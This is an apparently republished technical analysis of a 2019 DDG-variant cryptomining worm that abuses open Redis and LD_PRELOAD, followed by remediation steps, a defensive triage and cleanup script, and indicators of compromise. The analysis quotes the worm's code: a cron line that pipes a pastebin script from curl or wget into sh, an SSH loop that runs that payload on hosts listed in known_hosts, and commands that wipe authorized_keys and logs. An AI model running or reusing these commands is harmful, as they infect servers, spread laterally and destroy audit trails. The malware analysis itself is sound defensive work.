How the DDG Variant Malware Infects Linux Servers and How to Clean It
In February 2019 a DDG‑variant cryptomining worm spread across Linux servers by exploiting unauthenticated Redis instances, hijacking system binaries via LD_PRELOAD, and using SSH known_hosts for lateral movement, prompting a detailed technical analysis and step‑by‑step remediation guide.
Incident Overview
On 21 February 2019 a DDG‑variant mining worm was observed spreading across Linux servers. It scans for Redis instances that accept unauthenticated connections and uses such an instance to write its payload onto the host. The payload installs an LD_PRELOAD hook by adding /usr/local/lib/libioset.so to /etc/ld.so.preload, so the malicious library is loaded into every dynamically linked program started afterwards, and it then fetches and runs the rest of the worm.
Malicious Artifacts
LD_PRELOAD hijack file: /etc/ld.so.preload → /usr/local/lib/libioset.so
Binary files: /tmp/watchdogs, /usr/sbin/watchdogs, /tmp/ksoftirqds
Cron job files: /etc/cron.d/tomcat, /etc/cron.d/root, /var/spool/cron/root, /var/spool/cron/crontabs/root
Init script: /etc/rc.d/init.d/watchdogs
Payload Delivery
The worm installs a root cron entry that, every 10 minutes (the */10 schedule shown below), downloads a base64‑encoded script from https://pastebin.com/raw/sByq0rym with curl (falling back to wget) and pipes it straight into sh.
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym || wget -q -O- https://pastebin.com/raw/sByq0rym) | sh" | crontab -
Malware Behavior
The downloaded script performs the following actions:
Kills competing mining or DDoS processes by name, using ps | grep | awk '{print $2}' | xargs kill -9 pipelines.
Removes the immutable attribute (chattr -i) from files it needs to overwrite, such as its own cron entries and /etc/ld.so.preload, and, under a condition set earlier in the script, kills any process using 80% or more CPU.
Downloads a UPX‑packed Monero miner disguised as an image, makes it executable, and runs it in the background.
Harvests IPv4 addresses from /root/.ssh/known_hosts and, relying on root's existing key‑based SSH trust, connects to each host with a 5‑second timeout and runs the same download‑and‑execute payload there.
Overwrites /root/.ssh/authorized_keys and truncates log and mail files to hide its activity.
# Example of killing known malicious processes
ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9
# ... many similar lines omitted ...

# Unlock and remove protected files (chattr -i clears the immutable attribute)
chattr -i /etc/cron.d/root
chattr -i /etc/cron.d/system
chattr -i /etc/ld.so.preload

# Conditional high-CPU kill (p is set earlier in the full script, not shown in this excerpt)
if [ ${p} -eq 0 ]; then
    ps auxf | grep -v grep | awk '{if($3>=80.0) print $2}' | xargs kill -9
fi

# Lateral propagation via SSH
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do
        ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL https://pastebin.com/raw/sByq0rym || wget -q -O- https://pastebin.com/raw/sByq0rym) | sh > /dev/null 2>&1 &"
    done
fi
echo 0 >/root/.ssh/authorized_keys

# Clear logs
echo 0 >/var/spool/mail/root
echo 0 >/var/log/wtmp
echo 0 >/var/log/secure
echo 0 >/var/log/cron
Remediation Steps
Use the open‑source cleaning tool provided at https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool to automate removal of the malicious files and restore system attributes.
Restrict Redis to listen only on localhost and set a password in /etc/redis.conf (e.g., bind 127.0.0.1 and requirepass <your‑password>), then restart the Redis service.
Perform a network‑wide scan for Redis instances that answer without authentication and harden each one the same way; an exposed, password‑less Redis is a configuration fault, not a missing patch.
In emergency situations, isolate infected hosts from the network to stop further lateral spread.
Remove /root/.ssh/known_hosts and any private keys if they are not required for legitimate operations, and review /root/.ssh/authorized_keys, which the worm overwrites.
Deploy a static BusyBox binary to /bin/ and use it to delete the malicious files: a statically linked binary never goes through the dynamic loader, so /etc/ld.so.preload is not consulted and the hijacking library cannot interfere with the cleanup.
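The triage and cleanup below is an added example written for this page; it is not the MoreSecLab tool and not code from the original analysis. It checks a filesystem for the artifacts named in this article (the ld.so.preload entry, the dropped binaries and init script, and cron entries that pipe the pastebin script into sh) and removes them. The ROOT argument and the BB variable are assumptions: ROOT lets the checks run against a mounted image or a scratch directory instead of the live system, and BB points at the static BusyBox binary that the remediation step recommends, falling back to the normal PATH tools when it is absent.

```shell
#!/bin/sh
# Added example: offline triage and cleanup for the DDG-variant artifacts above.
# Assumptions: ROOT (default /) is the filesystem to inspect; BB (default
# /bin/busybox) is a static BusyBox used so that /etc/ld.so.preload is never
# consulted while we delete files.

PRELOAD_LIB_RE='libioset\.so'
DDG_FILES="/usr/local/lib/libioset.so /tmp/watchdogs /usr/sbin/watchdogs /tmp/ksoftirqds /etc/rc.d/init.d/watchdogs"
DDG_CRONS="/etc/cron.d/tomcat /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root"
CRON_RE='pastebin\.com/raw/sByq0rym.*\| *sh'

# Run a tool through BusyBox when a static one is available, else from PATH.
bb() {
    if [ -x "${BB:-/bin/busybox}" ]; then "${BB:-/bin/busybox}" "$@"; else "$@"; fi
}

# ddg_triage ROOT: print one "HIT ..." line per indicator found under ROOT,
# then a SUMMARY line. Exit status is 0 only when nothing was found.
ddg_triage() {
    root="${1:-/}"; root="${root%/}"
    hits=0
    preload="$root/etc/ld.so.preload"
    if [ -f "$preload" ] && bb grep -q "$PRELOAD_LIB_RE" "$preload"; then
        echo "HIT preload: $preload references libioset.so"
        hits=$((hits + 1))
    fi
    for f in $DDG_FILES; do
        if [ -e "$root$f" ]; then
            echo "HIT file: $root$f"
            hits=$((hits + 1))
        fi
    done
    # Only flag a cron file if it actually carries the download-and-execute line;
    # /var/spool/cron/root may hold legitimate entries on a clean host.
    for c in $DDG_CRONS; do
        if [ -f "$root$c" ] && bb grep -Eq "$CRON_RE" "$root$c"; then
            echo "HIT cron: $root$c (pipes the pastebin script into sh)"
            hits=$((hits + 1))
        fi
    done
    echo "SUMMARY: $hits indicator(s) found"
    [ "$hits" -eq 0 ]
}

# ddg_remove ROOT: clear the immutable bit and delete the dropped files and the
# matching cron entries, then strip the libioset.so line from ld.so.preload
# while keeping any other preload entries the administrator may rely on.
ddg_remove() {
    root="${1:-/}"; root="${root%/}"
    for f in $DDG_FILES; do
        [ -e "$root$f" ] || continue
        bb chattr -i "$root$f" 2>/dev/null || true   # no-op where chattr is unavailable
        bb rm -f "$root$f"
    done
    for c in $DDG_CRONS; do
        [ -f "$root$c" ] && bb grep -Eq "$CRON_RE" "$root$c" || continue
        bb chattr -i "$root$c" 2>/dev/null || true
        bb rm -f "$root$c"
    done
    preload="$root/etc/ld.so.preload"
    if [ -f "$preload" ]; then
        bb chattr -i "$preload" 2>/dev/null || true
        bb grep -v "$PRELOAD_LIB_RE" "$preload" > "$preload.clean" || true
        bb mv "$preload.clean" "$preload"   # an empty ld.so.preload is harmless
    fi
}
```

Run ddg_triage first on a live host (or on an image mounted read-only) and only then ddg_remove; the script deliberately leaves kill‑ing the miner processes and the Redis hardening to the operator, since process names vary between samples and the Redis change is a configuration edit rather than a file deletion.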
Indicators of Compromise (IOCs)
Domain: http://thyrsi.com
IP address: 47.110.190.245
Mining pool: xmr.f2pool.com
MD5 hashes of known malicious binaries:
aee3a19beb22527a1e0feac76344894c
86e2f5859ca276f307a034b5c7c450f1
ae356f2499b2228e86bcc4d61f4a29c9
d6a146161ec201f9b3f20fbfd528f901
a48f529646b8b5e96bab67d6d517a975
04ca88d563b568bac6d1f64faf4d390e
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.
ITPUB
Official ITPUB account sharing technical insights, community news, and exciting events.